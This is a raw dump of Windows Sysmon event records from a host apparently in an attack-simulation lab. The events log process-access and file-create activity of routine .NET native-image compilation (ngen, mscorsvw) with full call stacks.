13:48:25.154{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:25.076{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c50-0\XamlBuildTask.dll2021-01-18 13:48:25.076 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:26.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.544{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:26.544{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:25.654{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.591{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-91A9-6005-FC02-00000000A301}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:25.591{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-91A9-6005-FC02-00000000A301}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.560{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.560{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:25.560{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.622{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.607{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:27.607{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:27.326{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.310{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:27.310{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:32.591{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\System.dll2021-01-18 13:48:32.591 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:33.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.716{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:33.716{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:33.325{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.310{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:33.310{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
